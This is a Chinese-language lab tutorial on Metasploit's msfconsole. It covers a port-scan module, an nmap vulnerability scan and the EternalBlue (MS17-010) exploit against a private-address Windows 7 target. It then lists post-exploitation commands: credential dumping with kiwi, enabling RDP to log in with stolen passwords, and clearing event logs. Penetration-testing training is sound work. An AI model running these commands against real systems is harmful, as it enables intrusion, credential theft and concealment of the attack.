目录
前言
msfconsole的使用基础
启动mfsconsole
各种辅助模块的使用
端口扫描模块(portscan)
查看端口扫描的模块
使用模块
查看所需设置
手动设置
执行
退出
各种漏洞模块的使用
nmap扫描主机漏洞
查看漏洞模块
使用漏洞模块
查看所需设置
执行(开始攻击)
前言
msfconsole,全称Metasploit Framework console,是一个开源的渗透测试框架,主要用于网络安全评估和漏洞利用。它包含了各种漏洞利用模块、木马生成工具以及多种渗透文件。该工具不仅能够进行端口扫描、服务检测,还能利用已知漏洞攻击靶机,甚至生成各种渗透文件和木马。
这里靶机任然是centos服务机,ip地址为192.168.100.130。
msfconsole的使用基础
启动mfsconsole
msfconsole
msfconsole每次启动时,都会出现不同的有趣的图案。
各种辅助模块的使用
这里的模块很多,比如辅助模块,漏洞模块,攻击载荷……
search 模块————查看模块
use 编号————使用具体的模块
show options————查看所需设置
set 设置名 内容————手动设置
run / exploit————执行
back / exit————退出
端口扫描模块(portscan)
这里演示的是辅助模块 “端口扫描” 的使用
查看端口扫描的模块
search portscan
结果中共有8个供选择的端口扫描模块
使用模块
use 编号
或
use 模块具体名称
比如这里使用1模块:
use 1或者use auxiliary/scanner/natpmp/natpmp_portscan
查看所需设置
show options
结果中yes表示需要手动设置,也可以默认使用对应左边的设置;no表示不需要设置。
这里结果显示 1 模块需要设置lifetime,ports,protocol,rhosts,rport,threads
由于rhosts默认设置为空,所以我们必须手动设置rhosts,其他几项使用默认设置。
手动设置
set 设置名 内容
set rhosts 192.168.100.130
及设置目标IP为192.168.100.130
执行
run
或者
exploit
结果没有显示该端口OPEN,即该端口为关闭状态。
退出
退出到msf6——back
完全退出——exit
各种漏洞模块的使用
如果已知主机有某个漏洞,就可以直接使用该漏洞模块,基本用法和辅助模块基本一致。
这里我们使用windows7 做靶机,kali机做攻击机。
nmap扫描主机漏洞
nmap -script=vuln 主机IP
nmap -script=vuln 192.168.100.132
扫描结果显示目标主机可能有ms17-010漏洞,即永恒之蓝漏洞。
查看漏洞模块
search ms17-010
可以使用的模块有5个,24模块auxiliary/scanner/smb/smb_ms17_010可以用来进一步判断目标主机是否有ms17-010漏洞;0模块exploit/windows/smb/ms17_010_eternalblue用于漏洞攻击。
使用漏洞模块
这里就直接使用0模块exploit/windows/smb/ms17_010_eternalblue来利用漏洞攻击主机,就不适用24模块进一步验证了。
use 0或者use exploit/windows/smb/ms17_010_eternalblue
查看所需设置
show options
结果显示需要手动设置RHOSTS,其他几项可以不用设置或使用默认设置。
手动设置
set rhosts 目标地址
set rhosts 192.168.100.132
执行(开始攻击)
run 或者 exploit
如果攻击成功,就会进入目标机的cmd管理界面meterpreter>,然后可以进行下列操作:
getsystem查看权限
screenshot捕获主机当前屏幕截屏
upload file.txt c:// 将file.txt文件上传到目标机c://
download d://1.txt 下载目标机d://1.txt文件
idletime 检查目标系统空闲时间
load kiwi加载猕猴桃插件,输入creds kerveros 抓取目标主机用户和密码
run post/windows/manage/enable_rdp 启用目标主机远程桌面连接,然后输入rdesktop ip地址:远程连接目标主机桌面,结合抓取到的用户密码登录
clearev清除日志记录
输入shell进入终端命令行meterpreter>shell
chcp 65001解决终端乱码问题
dir查看所有目录
net user查看用户
exit退出命令行